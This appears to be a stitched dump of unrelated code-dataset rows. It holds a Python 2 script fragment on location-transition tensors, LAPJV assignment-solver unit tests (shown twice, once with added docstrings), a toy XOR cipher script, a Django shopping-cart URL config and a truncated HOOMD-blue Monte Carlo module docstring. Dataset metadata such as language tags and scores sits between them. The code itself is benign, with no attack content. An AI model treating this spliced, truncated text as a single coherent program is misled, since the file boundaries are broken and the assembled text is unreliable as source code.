if __name__ == '__main__':
# init_data((0, 3, 4, 5, 30))
#res, sigma, param = matrix_sn_nn([[2**0.5/2, -2**0.5/2], [2**0.5/2, 2**0.5/2]])
#res, sigma, param = matrix_sn_nn([[0.2, 0.8], [0.3, 0.7]])
# print "res2: ", res,res[0][0],res[0][1]
# print "sigma: ", sigma
# print "param: ", param.dot(np.linalg.inv(param))
# res = matrix_sn_nn([[0.1, 0.2, 0.3, 0.4], [0.3, 0.6, 0.05, 0.05]])
res = matrix_sn_nn([[-0.1, 0.2, 0.5, 0.5], [0.3, 0.6, 0.1, 0]])
print "res2:", res | en | 0.357107 | #!/usr/bin/env python # coding: UTF-8 gowalla_filter: SELECT user,COUNT(unkown) as loc,COUNT(DISTINCT unkown) as distinct_loc,COUNT(unkown)/COUNT(DISTINCT unkown) as ratio FROM raw a GROUP BY `user` ORDER BY ratio desc; 找出那些比率(所有地点/不同地点)合适的用户 所有地点决定了tensor的稀疏度;不同地点决定了tensor的dimensionality eg:找到了用户id为147986的所有记录,并将unknow一栏替换为字母(为了方便分析) #连接数据库 #得到用户所有位置移动信息,按时间排序 #select distinct poi_name from staypoint where user_id in (0,3,4,5,30) and province = '北京市' and district = "海淀区"; #print len(result) # print pois_axis # print axis_pois # print datas # 连接数据库 strategy 1: arrival_slot; 2: existance #得到用户所有位置移动信息,按时间排序 #select distinct poi_name from staypoint where user_id in (0,3,4,5,30) and province = '北京市' and district = "海淀区"; # print len(result) # trains = {} # sql = "select poi_name from staypoint where user_id = "+ str(user) +" and province = '北京市' and district = '海淀区' and arrival_timestamp % 86400 div 3600 = "+str(slot) # train_data_list = [] # print data.keys() # print type(index) # print data.has_key(index) # train_data_list.append(pois_axis[item[0]]) # train_set = set(train_data_list) # print "trainset: ", train_set # trains[user] = train_set # print pois_axis # print axis_pois # print datas # 从线性停留点序列计算马儿可夫转移矩阵或转移张量 # 得到停留点序列长度 # 三维数组,元素初始化为零 # 从线性停留点序列统计用户-时间-频数 # 三维数组,元素初始化为零 # for item in range(dimensionality): # for item2 in range(dimensionality): # count_sum = 0 # for item3 in range(dimensionality): # count_sum += tensor[item][item2][item3] # if 0 == count_sum: # continue # else: # for item4 in range(dimensionality): # tensor[item][item2][item4] = tensor[item][item2][item4] / count_sum # # print tensor[:-1] # x = np.array(matrix) # # # sum(1) 按行求和 # print "sum: ", x.sum(1) # # U, s, Vh = linalg.svd(matrix, full_matrices=True) # # print type(s) # # # print U # U2 = U[:, :] # # print U2 # # V2 = Vh[:, :] # # s = s[:] # S = np.diag(s) # # print S # # # S = linalg.diagsvd(s, 6, 6) # # print np.allclose(tensor, np.dot(U, 
np.dot(S, Vh))) # # print np.allclose(matrix, np.dot(U2, np.dot(S, V2))) # # temp = U2.transpose().sum(1) # print "temp1: ", temp.shape # temp = np.array([temp]).transpose() # print "temp2: ", temp.shape # # # print type(temp) # # print identity(4) # # # # # # print type(eye(4)) # # print eye(4).shape[1] # # flag, num = is_contain_zero(temp) # nr = U2.shape[1] # # print "is_contains_zero: ", flag, num # # if flag: # print nr, num, type(np.zeros((nr, num-1))), type(temp) # print np.zeros((nr, num-1)).shape # print temp.shape, np.ones((nr, 1)).shape # # print np.sum([[0, 1], [0, 5]], axis=1) # # # temp_matrix = np.concatenate((np.zeros((nr, num-1)), temp-np.ones((nr, 1))), 1) # sigma = identity(nr) + np.concatenate((temp_matrix, np.zeros((nr, nr-num))), 1) # else: # sigma = np.diag(temp) # # res = U2.dot(sigma) # print np.transpose(S) #, sigma, param_matrix # init_data((0, 3, 4, 5, 30)) #res, sigma, param = matrix_sn_nn([[2**0.5/2, -2**0.5/2], [2**0.5/2, 2**0.5/2]]) #res, sigma, param = matrix_sn_nn([[0.2, 0.8], [0.3, 0.7]]) # print "res2: ", res,res[0][0],res[0][1] # print "sigma: ", sigma # print "param: ", param.dot(np.linalg.inv(param)) # res = matrix_sn_nn([[0.1, 0.2, 0.3, 0.4], [0.3, 0.6, 0.05, 0.05]]) | 2.651484 | 3 |
tests/test_lapjv.py | DavidStirling/centrosome | 0 | 6617431 | <reponame>DavidStirling/centrosome<gh_stars>0
from __future__ import absolute_import
import numpy as np
import unittest
import centrosome.lapjv as LAPJV
from centrosome.filter import permutations
from six.moves import range
from six.moves import zip
class TestLAPJVPYX(unittest.TestCase):
def test_01_01_reduction_transfer(self):
"""Test the reduction transfer implementation"""
cases = [
dict(
i=[0, 1, 2],
j=[0, 1, 2, 0, 1, 2, 0, 1, 2],
idx=[0, 3, 6],
count=[3, 3, 3],
x=[2, 0, 1],
y=[1, 2, 0],
c=[5.0, 4.0, 1.0, 2.0, 6.0, 4.0, 4.0, 3.0, 7.0],
u_in=[0.0, 0.0, 0.0],
v_in=[1.0, 2.0, 3.0],
u_out=[2.0, 3.0, 6.0],
v_out=[-2.0, -4.0, 1.0],
),
dict(
i=[1, 2, 3],
j=[0, 1, 2, 0, 1, 2, 0, 1, 2, 0, 1, 2],
idx=[0, 3, 6, 9],
count=[3, 3, 3, 3],
x=[3, 2, 0, 1],
y=[1, 2, 0, 3],
c=[0.0, 0.0, 0.0, 5.0, 4.0, 1.0, 2.0, 6.0, 4.0, 4.0, 3.0, 7.0],
u_in=[0.0, 0.0, 0.0, 0.0],
v_in=[1.0, 2.0, 3.0, 0.0],
u_out=[0.0, 2.0, 3.0, 6.0],
v_out=[-2.0, -4.0, 1.0, 0.0],
),
]
for case in cases:
u = np.ascontiguousarray(case["u_in"], np.float64)
v = np.ascontiguousarray(case["v_in"], np.float64)
LAPJV.reduction_transfer(
np.ascontiguousarray(case["i"], np.uint32),
np.ascontiguousarray(case["j"], np.uint32),
np.ascontiguousarray(case["idx"], np.uint32),
np.ascontiguousarray(case["count"], np.uint32),
np.ascontiguousarray(case["x"], np.uint32),
u,
v,
np.ascontiguousarray(case["c"], np.float64),
)
expected_u = np.array(case["u_out"])
expected_v = np.array(case["v_out"])
np.testing.assert_array_almost_equal(expected_u, u)
np.testing.assert_array_almost_equal(expected_v, v)
def test_02_01_augmenting_row_reduction(self):
cases = [
dict(
n=3,
ii=[1],
jj=[0, 1, 2, 0, 1, 2, 0, 1, 2],
idx=[0, 3, 6],
count=[3, 3, 3],
x=[1, 3, 0],
y=[2, 0, 3],
u_in=[1.0, 2.0, 3.0],
v_in=[1.0, 2.0, 3.0],
c=[3.0, 6.0, 5.0, 5.0, 5.0, 7.1, 8.0, 11.0, 9.0],
u_out=[1.0, 2.0, 3.0],
v_out=[1.0, 1.0, 3.0],
x_out=[2, 1, 0],
y_out=[2, 1, 0],
)
]
for case in cases:
u = np.ascontiguousarray(case["u_in"], np.float64)
v = np.ascontiguousarray(case["v_in"], np.float64)
x = np.ascontiguousarray(case["x"], np.uint32)
y = np.ascontiguousarray(case["y"], np.uint32)
LAPJV.augmenting_row_reduction(
case["n"],
np.ascontiguousarray(case["ii"], np.uint32),
np.ascontiguousarray(case["jj"], np.uint32),
np.ascontiguousarray(case["idx"], np.uint32),
np.ascontiguousarray(case["count"], np.uint32),
x,
y,
u,
v,
np.ascontiguousarray(case["c"], np.float64),
)
expected_u = np.array(case["u_out"])
expected_v = np.array(case["v_out"])
expected_x = np.array(case["x_out"])
expected_y = np.array(case["y_out"])
np.testing.assert_array_almost_equal(expected_u, u)
np.testing.assert_array_almost_equal(expected_v, v)
np.testing.assert_array_equal(expected_x, x)
np.testing.assert_array_equal(expected_y, y)
def test_03_01_augment(self):
cases = [
dict(
n=3,
i=[2],
j=[0, 1, 2, 0, 1, 2, 0, 1, 2],
idx=[0, 3, 6],
count=[3, 3, 3],
x_in=[0, 1, 3],
x_out=[0, 1, 2],
y_in=[0, 1, 3],
y_out=[0, 1, 2],
u_in=[4, 0, 2],
v_in=[-1, 1, 1],
u_out=[4, 0, 2],
v_out=[-1, 1, 1],
c=[3, 5, 7, 4, 1, 6, 2, 3, 3],
)
]
for case in cases:
n = case["n"]
i = np.ascontiguousarray(case["i"], np.uint32)
j = np.ascontiguousarray(case["j"], np.uint32)
idx = np.ascontiguousarray(case["idx"], np.uint32)
count = np.ascontiguousarray(case["count"], np.uint32)
x = np.ascontiguousarray(case["x_in"], np.uint32)
y = np.ascontiguousarray(case["y_in"], np.uint32)
u = np.ascontiguousarray(case["u_in"], np.float64)
v = np.ascontiguousarray(case["v_in"], np.float64)
c = np.ascontiguousarray(case["c"], np.float64)
LAPJV.augment(n, i, j, idx, count, x, y, u, v, c)
np.testing.assert_array_equal(x, case["x_out"])
np.testing.assert_array_equal(y, case["y_out"])
np.testing.assert_almost_equal(u, case["u_out"])
np.testing.assert_almost_equal(v, case["v_out"])
class TestLAPJV(unittest.TestCase):
def test_01_02(self):
r = np.random.RandomState()
r.seed(11)
for reductions in [0, 2]:
for _ in range(100):
c = r.randint(1, 10, (5, 5))
i, j = np.mgrid[0:5, 0:5]
i = i.flatten()
j = j.flatten()
x, y, u, v = LAPJV.lapjv(i, j, c.flatten(), True, reductions)
min_cost = np.sum(c)
best = None
for permutation in permutations([0, 1, 2, 3, 4]):
cost = sum([c[i, permutation[i]] for i in range(5)])
if cost < min_cost:
best = list(permutation)
min_cost = cost
result_cost = sum([c[i, x[i]] for i in range(5)])
self.assertAlmostEqual(min_cost, result_cost)
def test_01_03(self):
"""Regression tests of matrices that crashed lapjv"""
dd = [
np.array(
[
[0.0, 0.0, 0.0],
[1.0, 1.0, 5.34621029],
[1.0, 7.0, 55.0],
[2.0, 2.0, 2.09806089],
[2.0, 8.0, 55.0],
[3.0, 3.0, 4.82063029],
[3.0, 9.0, 55.0],
[4.0, 4.0, 3.99481917],
[4.0, 10.0, 55.0],
[5.0, 5.0, 3.18959054],
[5.0, 11.0, 55.0],
[6.0, 1.0, 55.0],
[6.0, 7.0, 0.0],
[6.0, 8.0, 0.0],
[6.0, 9.0, 0.0],
[6.0, 10.0, 0.0],
[6.0, 11.0, 0.0],
[7.0, 2.0, 55.0],
[7.0, 7.0, 0.0],
[7.0, 8.0, 0.0],
[7.0, 9.0, 0.0],
[7.0, 10.0, 0.0],
[7.0, 11.0, 0.0],
[8.0, 3.0, 55.0],
[8.0, 7.0, 0.0],
[8.0, 8.0, 0.0],
[8.0, 9.0, 0.0],
[8.0, 10.0, 0.0],
[8.0, 11.0, 0.0],
[9.0, 4.0, 55.0],
[9.0, 7.0, 0.0],
[9.0, 8.0, 0.0],
[9.0, 9.0, 0.0],
[9.0, 10.0, 0.0],
[9.0, 11.0, 0.0],
[10.0, 5.0, 55.0],
[10.0, 7.0, 0.0],
[10.0, 8.0, 0.0],
[10.0, 9.0, 0.0],
[10.0, 10.0, 0.0],
[10.0, 11.0, 0.0],
[11.0, 6.0, 55.0],
[11.0, 7.0, 0.0],
[11.0, 8.0, 0.0],
[11.0, 9.0, 0.0],
[11.0, 10.0, 0.0],
[11.0, 11.0, 0.0],
]
),
np.array(
[
[0.0, 0.0, 0.0],
[1.0, 1.0, 1.12227977],
[1.0, 6.0, 55.0],
[2.0, 2.0, 18.66735253],
[2.0, 4.0, 16.2875504],
[2.0, 7.0, 55.0],
[3.0, 5.0, 1.29944194],
[3.0, 8.0, 55.0],
[4.0, 5.0, 32.61892281],
[4.0, 9.0, 55.0],
[5.0, 1.0, 55.0],
[5.0, 6.0, 0.0],
[5.0, 7.0, 0.0],
[5.0, 8.0, 0.0],
[5.0, 9.0, 0.0],
[6.0, 2.0, 55.0],
[6.0, 6.0, 0.0],
[6.0, 7.0, 0.0],
[6.0, 8.0, 0.0],
[6.0, 9.0, 0.0],
[7.0, 3.0, 55.0],
[7.0, 6.0, 0.0],
[7.0, 7.0, 0.0],
[7.0, 8.0, 0.0],
[7.0, 9.0, 0.0],
[8.0, 4.0, 55.0],
[8.0, 6.0, 0.0],
[8.0, 7.0, 0.0],
[8.0, 8.0, 0.0],
[8.0, 9.0, 0.0],
[9.0, 5.0, 55.0],
[9.0, 6.0, 0.0],
[9.0, 7.0, 0.0],
[9.0, 8.0, 0.0],
[9.0, 9.0, 0.0],
]
),
]
expected_costs = [74.5, 1000000]
for d, ec in zip(dd, expected_costs):
n = np.max(d[:, 0].astype(int)) + 1
x, y = LAPJV.lapjv(d[:, 0].astype(int), d[:, 1].astype(int), d[:, 2])
c = np.ones((n, n)) * 1000000
c[d[:, 0].astype(int), d[:, 1].astype(int)] = d[:, 2]
self.assertTrue(np.sum(c[np.arange(n), x]) < ec)
self.assertTrue(np.sum(c[y, np.arange(n)]) < ec)
| from __future__ import absolute_import
import numpy as np
import unittest
import centrosome.lapjv as LAPJV
from centrosome.filter import permutations
from six.moves import range
from six.moves import zip
class TestLAPJVPYX(unittest.TestCase):
    """Tests for the low-level helpers of the LAPJV assignment solver.

    The helpers operate on a sparse cost matrix stored in a CSR-like
    layout: ``j`` holds the column index of every stored entry, ``c`` the
    matching cost, ``idx`` the offset of each row's first entry, and
    ``count`` the number of stored entries per row.  ``x``/``y`` hold the
    row->column and column->row assignments and ``u``/``v`` the dual
    variables of the assignment problem.
    """
    def test_01_01_reduction_transfer(self):
        """Test the reduction transfer implementation"""
        # Each case supplies the sparse matrix plus the dual variables
        # before the call (u_in / v_in) and the expected dual variables
        # afterwards (u_out / v_out).  The second case extends the first
        # by an extra all-zero row to check offset handling.
        cases = [
            dict(
                i=[0, 1, 2],
                j=[0, 1, 2, 0, 1, 2, 0, 1, 2],
                idx=[0, 3, 6],
                count=[3, 3, 3],
                x=[2, 0, 1],
                y=[1, 2, 0],
                c=[5.0, 4.0, 1.0, 2.0, 6.0, 4.0, 4.0, 3.0, 7.0],
                u_in=[0.0, 0.0, 0.0],
                v_in=[1.0, 2.0, 3.0],
                u_out=[2.0, 3.0, 6.0],
                v_out=[-2.0, -4.0, 1.0],
            ),
            dict(
                i=[1, 2, 3],
                j=[0, 1, 2, 0, 1, 2, 0, 1, 2, 0, 1, 2],
                idx=[0, 3, 6, 9],
                count=[3, 3, 3, 3],
                x=[3, 2, 0, 1],
                y=[1, 2, 0, 3],
                c=[0.0, 0.0, 0.0, 5.0, 4.0, 1.0, 2.0, 6.0, 4.0, 4.0, 3.0, 7.0],
                u_in=[0.0, 0.0, 0.0, 0.0],
                v_in=[1.0, 2.0, 3.0, 0.0],
                u_out=[0.0, 2.0, 3.0, 6.0],
                v_out=[-2.0, -4.0, 1.0, 0.0],
            ),
        ]
        for case in cases:
            # u and v are updated in place by reduction_transfer, so make
            # fresh contiguous float64 copies for each case.
            u = np.ascontiguousarray(case["u_in"], np.float64)
            v = np.ascontiguousarray(case["v_in"], np.float64)
            LAPJV.reduction_transfer(
                np.ascontiguousarray(case["i"], np.uint32),
                np.ascontiguousarray(case["j"], np.uint32),
                np.ascontiguousarray(case["idx"], np.uint32),
                np.ascontiguousarray(case["count"], np.uint32),
                np.ascontiguousarray(case["x"], np.uint32),
                u,
                v,
                np.ascontiguousarray(case["c"], np.float64),
            )
            expected_u = np.array(case["u_out"])
            expected_v = np.array(case["v_out"])
            np.testing.assert_array_almost_equal(expected_u, u)
            np.testing.assert_array_almost_equal(expected_v, v)
    def test_02_01_augmenting_row_reduction(self):
        """Check augmenting_row_reduction against a hand-computed case.

        ``ii`` lists the rows to be processed (presumably the currently
        unassigned rows -- confirm against the Cython signature).  The
        expected post-call assignments (x_out / y_out) and duals
        (u_out / v_out) were worked out by hand for the 3x3 cost matrix
        in ``c``.
        """
        cases = [
            dict(
                n=3,
                ii=[1],
                jj=[0, 1, 2, 0, 1, 2, 0, 1, 2],
                idx=[0, 3, 6],
                count=[3, 3, 3],
                x=[1, 3, 0],
                y=[2, 0, 3],
                u_in=[1.0, 2.0, 3.0],
                v_in=[1.0, 2.0, 3.0],
                c=[3.0, 6.0, 5.0, 5.0, 5.0, 7.1, 8.0, 11.0, 9.0],
                u_out=[1.0, 2.0, 3.0],
                v_out=[1.0, 1.0, 3.0],
                x_out=[2, 1, 0],
                y_out=[2, 1, 0],
            )
        ]
        for case in cases:
            # x, y, u and v are all modified in place.
            u = np.ascontiguousarray(case["u_in"], np.float64)
            v = np.ascontiguousarray(case["v_in"], np.float64)
            x = np.ascontiguousarray(case["x"], np.uint32)
            y = np.ascontiguousarray(case["y"], np.uint32)
            LAPJV.augmenting_row_reduction(
                case["n"],
                np.ascontiguousarray(case["ii"], np.uint32),
                np.ascontiguousarray(case["jj"], np.uint32),
                np.ascontiguousarray(case["idx"], np.uint32),
                np.ascontiguousarray(case["count"], np.uint32),
                x,
                y,
                u,
                v,
                np.ascontiguousarray(case["c"], np.float64),
            )
            expected_u = np.array(case["u_out"])
            expected_v = np.array(case["v_out"])
            expected_x = np.array(case["x_out"])
            expected_y = np.array(case["y_out"])
            np.testing.assert_array_almost_equal(expected_u, u)
            np.testing.assert_array_almost_equal(expected_v, v)
            np.testing.assert_array_equal(expected_x, x)
            np.testing.assert_array_equal(expected_y, y)
    def test_03_01_augment(self):
        """Check the shortest-augmenting-path step (augment).

        Row 2 (``i``) starts unassigned (x_in / y_in use the sentinel
        value 3 == n); after augmentation the assignment should be the
        identity permutation with the dual variables unchanged.
        """
        cases = [
            dict(
                n=3,
                i=[2],
                j=[0, 1, 2, 0, 1, 2, 0, 1, 2],
                idx=[0, 3, 6],
                count=[3, 3, 3],
                x_in=[0, 1, 3],
                x_out=[0, 1, 2],
                y_in=[0, 1, 3],
                y_out=[0, 1, 2],
                u_in=[4, 0, 2],
                v_in=[-1, 1, 1],
                u_out=[4, 0, 2],
                v_out=[-1, 1, 1],
                c=[3, 5, 7, 4, 1, 6, 2, 3, 3],
            )
        ]
        for case in cases:
            n = case["n"]
            i = np.ascontiguousarray(case["i"], np.uint32)
            j = np.ascontiguousarray(case["j"], np.uint32)
            idx = np.ascontiguousarray(case["idx"], np.uint32)
            count = np.ascontiguousarray(case["count"], np.uint32)
            x = np.ascontiguousarray(case["x_in"], np.uint32)
            y = np.ascontiguousarray(case["y_in"], np.uint32)
            u = np.ascontiguousarray(case["u_in"], np.float64)
            v = np.ascontiguousarray(case["v_in"], np.float64)
            c = np.ascontiguousarray(case["c"], np.float64)
            LAPJV.augment(n, i, j, idx, count, x, y, u, v, c)
            np.testing.assert_array_equal(x, case["x_out"])
            np.testing.assert_array_equal(y, case["y_out"])
            np.testing.assert_almost_equal(u, case["u_out"])
            np.testing.assert_almost_equal(v, case["v_out"])
class TestLAPJV(unittest.TestCase):
    """End-to-end tests of the LAPJV linear assignment solver."""
    def test_01_02(self):
        """Compare lapjv's optimal cost to brute-force enumeration.

        Solves 100 random dense 5x5 integer cost matrices and checks the
        assignment cost matches the minimum found by enumerating all 5!
        permutations.  Runs with two settings of the final positional
        argument (presumably the number of augmenting-row-reduction
        passes -- confirm against the lapjv signature).
        """
        r = np.random.RandomState()
        r.seed(11)
        for reductions in [0, 2]:
            for _ in range(100):
                c = r.randint(1, 10, (5, 5))
                # Build the (i, j, cost) triples for the full dense matrix.
                i, j = np.mgrid[0:5, 0:5]
                i = i.flatten()
                j = j.flatten()
                x, y, u, v = LAPJV.lapjv(i, j, c.flatten(), True, reductions)
                # Brute-force the true optimum over all permutations.
                min_cost = np.sum(c)
                best = None
                for permutation in permutations([0, 1, 2, 3, 4]):
                    cost = sum([c[i, permutation[i]] for i in range(5)])
                    if cost < min_cost:
                        best = list(permutation)
                        min_cost = cost
                result_cost = sum([c[i, x[i]] for i in range(5)])
                self.assertAlmostEqual(min_cost, result_cost)
    def test_01_03(self):
        """Regression tests of matrices that crashed lapjv"""
        # Each row of the arrays below is an (i, j, cost) triple of a
        # sparse cost matrix; pairs not listed are given a large default
        # cost (1000000) when the dense matrix is rebuilt below.
        dd = [
            np.array(
                [
                    [0.0, 0.0, 0.0],
                    [1.0, 1.0, 5.34621029],
                    [1.0, 7.0, 55.0],
                    [2.0, 2.0, 2.09806089],
                    [2.0, 8.0, 55.0],
                    [3.0, 3.0, 4.82063029],
                    [3.0, 9.0, 55.0],
                    [4.0, 4.0, 3.99481917],
                    [4.0, 10.0, 55.0],
                    [5.0, 5.0, 3.18959054],
                    [5.0, 11.0, 55.0],
                    [6.0, 1.0, 55.0],
                    [6.0, 7.0, 0.0],
                    [6.0, 8.0, 0.0],
                    [6.0, 9.0, 0.0],
                    [6.0, 10.0, 0.0],
                    [6.0, 11.0, 0.0],
                    [7.0, 2.0, 55.0],
                    [7.0, 7.0, 0.0],
                    [7.0, 8.0, 0.0],
                    [7.0, 9.0, 0.0],
                    [7.0, 10.0, 0.0],
                    [7.0, 11.0, 0.0],
                    [8.0, 3.0, 55.0],
                    [8.0, 7.0, 0.0],
                    [8.0, 8.0, 0.0],
                    [8.0, 9.0, 0.0],
                    [8.0, 10.0, 0.0],
                    [8.0, 11.0, 0.0],
                    [9.0, 4.0, 55.0],
                    [9.0, 7.0, 0.0],
                    [9.0, 8.0, 0.0],
                    [9.0, 9.0, 0.0],
                    [9.0, 10.0, 0.0],
                    [9.0, 11.0, 0.0],
                    [10.0, 5.0, 55.0],
                    [10.0, 7.0, 0.0],
                    [10.0, 8.0, 0.0],
                    [10.0, 9.0, 0.0],
                    [10.0, 10.0, 0.0],
                    [10.0, 11.0, 0.0],
                    [11.0, 6.0, 55.0],
                    [11.0, 7.0, 0.0],
                    [11.0, 8.0, 0.0],
                    [11.0, 9.0, 0.0],
                    [11.0, 10.0, 0.0],
                    [11.0, 11.0, 0.0],
                ]
            ),
            np.array(
                [
                    [0.0, 0.0, 0.0],
                    [1.0, 1.0, 1.12227977],
                    [1.0, 6.0, 55.0],
                    [2.0, 2.0, 18.66735253],
                    [2.0, 4.0, 16.2875504],
                    [2.0, 7.0, 55.0],
                    [3.0, 5.0, 1.29944194],
                    [3.0, 8.0, 55.0],
                    [4.0, 5.0, 32.61892281],
                    [4.0, 9.0, 55.0],
                    [5.0, 1.0, 55.0],
                    [5.0, 6.0, 0.0],
                    [5.0, 7.0, 0.0],
                    [5.0, 8.0, 0.0],
                    [5.0, 9.0, 0.0],
                    [6.0, 2.0, 55.0],
                    [6.0, 6.0, 0.0],
                    [6.0, 7.0, 0.0],
                    [6.0, 8.0, 0.0],
                    [6.0, 9.0, 0.0],
                    [7.0, 3.0, 55.0],
                    [7.0, 6.0, 0.0],
                    [7.0, 7.0, 0.0],
                    [7.0, 8.0, 0.0],
                    [7.0, 9.0, 0.0],
                    [8.0, 4.0, 55.0],
                    [8.0, 6.0, 0.0],
                    [8.0, 7.0, 0.0],
                    [8.0, 8.0, 0.0],
                    [8.0, 9.0, 0.0],
                    [9.0, 5.0, 55.0],
                    [9.0, 6.0, 0.0],
                    [9.0, 7.0, 0.0],
                    [9.0, 8.0, 0.0],
                    [9.0, 9.0, 0.0],
                ]
            ),
        ]
        expected_costs = [74.5, 1000000]
        for d, ec in zip(dd, expected_costs):
            n = np.max(d[:, 0].astype(int)) + 1
            x, y = LAPJV.lapjv(d[:, 0].astype(int), d[:, 1].astype(int), d[:, 2])
            # Rebuild a dense cost matrix with the large default cost and
            # verify both the forward (row->col) and reverse (col->row)
            # assignments stay below the expected bound, i.e. lapjv ran to
            # completion and found a sensible assignment.
            c = np.ones((n, n)) * 1000000
            c[d[:, 0].astype(int), d[:, 1].astype(int)] = d[:, 2]
            self.assertTrue(np.sum(c[np.arange(n), x]) < ec)
            self.assertTrue(np.sum(c[y, np.arange(n)]) < ec)
Semester V/Kripto/xor_.py | RianWardanaPutra/School | 0 | 6617432 | def encrypt(plain, password):
plainIntVector = []
for i in plain:
plainIntVector.append(ord(i))
passwordIntVector = []
for i in password:
passwordIntVector.append(ord(i))
plainIndex = 0
cipherIntVector = []
while plainIndex < len(plain):
for i in range(len(password)):
if plainIndex == len(plain): break
oneCharCipher = plainIntVector[plainIndex] ^ passwordIntVector[i]
cipherIntVector.append(oneCharCipher)
plainIndex += 1
return cipherIntVector
def decrypt(cipher, password):
cipherIndex = 0
plainIntVector = []
while cipherIndex < len(cipher):
for i in password:
if cipherIndex == len(cipher):
break
oneCharPlain = cipher[cipherIndex] ^ ord(i)
plainIntVector.append(oneCharPlain)
cipherIndex += 1
plain = [chr(i) for i in plainIntVector]
plain = ''.join(plain)
return plain
plain = input("Plain text: ")
password = input("Password: ")
cipher = encrypt(plain, password)
print("Cipher: ", end='')
for i in cipher:
print(i, end=' ')
print("\nPlaintext: " + decrypt(cipher, password))
| def encrypt(plain, password):
plainIntVector = []
for i in plain:
plainIntVector.append(ord(i))
passwordIntVector = []
for i in password:
passwordIntVector.append(ord(i))
plainIndex = 0
cipherIntVector = []
while plainIndex < len(plain):
for i in range(len(password)):
if plainIndex == len(plain): break
oneCharCipher = plainIntVector[plainIndex] ^ passwordIntVector[i]
cipherIntVector.append(oneCharCipher)
plainIndex += 1
return cipherIntVector
def decrypt(cipher, password):
cipherIndex = 0
plainIntVector = []
while cipherIndex < len(cipher):
for i in password:
if cipherIndex == len(cipher):
break
oneCharPlain = cipher[cipherIndex] ^ ord(i)
plainIntVector.append(oneCharPlain)
cipherIndex += 1
plain = [chr(i) for i in plainIntVector]
plain = ''.join(plain)
return plain
plain = input("Plain text: ")
password = input("Password: ")
cipher = encrypt(plain, password)
print("Cipher: ", end='')
for i in cipher:
print(i, end=' ')
print("\nPlaintext: " + decrypt(cipher, password))
| none | 1 | 3.597596 | 4 | |
cart/urls.py | connectbushra/Django-Ecommerce-App | 1 | 6617433 | from django.contrib import admin
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.urls import path,include
from . import views
from django.conf.urls import url
from django.conf.urls import handler404
app_name = 'cart'
urlpatterns = [
path('', views.HomeView.as_view(), name='MyView'),
path('checkout/',views.checkout.as_view(),name="checkout"),
path('payment/',views.payment.as_view(),name="payment"),
path('product/<slug>/',views.ItemDetailView.as_view(), name='product'),
path('cart_add_item/<slug>', views.cart_add_item, name='cart_add_item'),
path('home_add_item/<slug>', views.home_add_item, name='home_add_item'),
path('add_qty/<slug>', views.add_qty, name='add_qty'),
path('delete_item/<slug>/', views.delete_item, name='delete_item'),
path('remove_qty/<slug>/', views.remove_qty, name='remove_qty'),
path('order-details/', views.OrderSummary.as_view(), name='order-details'),
path('<slug:category_slug>/',views.categories, name="categories"),
path('brands/<brand_slug>/',views.brands, name="brands"),
path('filter-data', views.filter_data, name='filter_data'),
# path('paginator', views.paginator, name='paginator'),
path('wish_list/<int:id>', views.wish_list, name="wish_list"),
path('verification/', include('verify_email.urls')),
path('search',views.search, name="search"),
path('review/<int:id>', views.review, name='review'),
]
| from django.contrib import admin
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.urls import path,include
from . import views
from django.conf.urls import url
from django.conf.urls import handler404
app_name = 'cart'
urlpatterns = [
path('', views.HomeView.as_view(), name='MyView'),
path('checkout/',views.checkout.as_view(),name="checkout"),
path('payment/',views.payment.as_view(),name="payment"),
path('product/<slug>/',views.ItemDetailView.as_view(), name='product'),
path('cart_add_item/<slug>', views.cart_add_item, name='cart_add_item'),
path('home_add_item/<slug>', views.home_add_item, name='home_add_item'),
path('add_qty/<slug>', views.add_qty, name='add_qty'),
path('delete_item/<slug>/', views.delete_item, name='delete_item'),
path('remove_qty/<slug>/', views.remove_qty, name='remove_qty'),
path('order-details/', views.OrderSummary.as_view(), name='order-details'),
path('<slug:category_slug>/',views.categories, name="categories"),
path('brands/<brand_slug>/',views.brands, name="brands"),
path('filter-data', views.filter_data, name='filter_data'),
# path('paginator', views.paginator, name='paginator'),
path('wish_list/<int:id>', views.wish_list, name="wish_list"),
path('verification/', include('verify_email.urls')),
path('search',views.search, name="search"),
path('review/<int:id>', views.review, name='review'),
]
| la | 0.259927 | # path('paginator', views.paginator, name='paginator'), | 1.910411 | 2 |
hoomd/hpmc/__init__.py | USF-GT-Molecular-Modeling/hoomd-blue | 0 | 6617434 | # Copyright (c) 2009-2022 The Regents of the University of Michigan.
# Part of HOOMD-blue, released under the BSD 3-Clause License.
"""Hard particle Monte Carlo.
In hard particle Monte Carlo (HPMC) simulations, the particles in the system
state have extended shapes. The potential energy of the system is infinite when
any particle shapes overlap. Pair (:doc:`module-hpmc-pair`) and external
(:doc:`module-hpmc-external`) potentials compute the potential energy when there
are no shape overlaps. `hpmc` employs the Metropolis Monte Carlo algorithm to
sample equilibrium configurations of the system.
To perform HPMC simulations, assign a HPMC integrator (`hoomd.hpmc.integrate`)
to the `hoomd.Simulation` operations. The HPMC integrator defines the particle
shapes and performs local trial moves on the particle positions and
orientations. HPMC updaters (`hoomd.hpmc.update`) interoperate with the
integrator to perform additional types of trial moves, including box moves,
cluster moves, and particle insertion/removal. Use HPMC computes
(`hoomd.hpmc.compute`) to compute properties of the system state, such as the
free volume or pressure.
See Also:
`Anderson 2016 <https://dx.doi.org/10.1016/j.cpc.2016.02.024>`_ further
describes the theory and implementation.
"""
# need to import all submodules defined in this directory
from hoomd.hpmc import integrate
from hoomd.hpmc import update
from hoomd.hpmc import compute
from hoomd.hpmc import tune
from hoomd.hpmc import pair
from hoomd.hpmc import external
from hoomd.hpmc import nec
from hoomd.hpmc import shape_move
| # Copyright (c) 2009-2022 The Regents of the University of Michigan.
# Part of HOOMD-blue, released under the BSD 3-Clause License.
"""Hard particle Monte Carlo.
In hard particle Monte Carlo (HPMC) simulations, the particles in the system
state have extended shapes. The potential energy of the system is infinite when
any particle shapes overlap. Pair (:doc:`module-hpmc-pair`) and external
(:doc:`module-hpmc-external`) potentials compute the potential energy when there
are no shape overlaps. `hpmc` employs the Metropolis Monte Carlo algorithm to
sample equilibrium configurations of the system.
To perform HPMC simulations, assign a HPMC integrator (`hoomd.hpmc.integrate`)
to the `hoomd.Simulation` operations. The HPMC integrator defines the particle
shapes and performs local trial moves on the particle positions and
orientations. HPMC updaters (`hoomd.hpmc.update`) interoperate with the
integrator to perform additional types of trial moves, including box moves,
cluster moves, and particle insertion/removal. Use HPMC computes
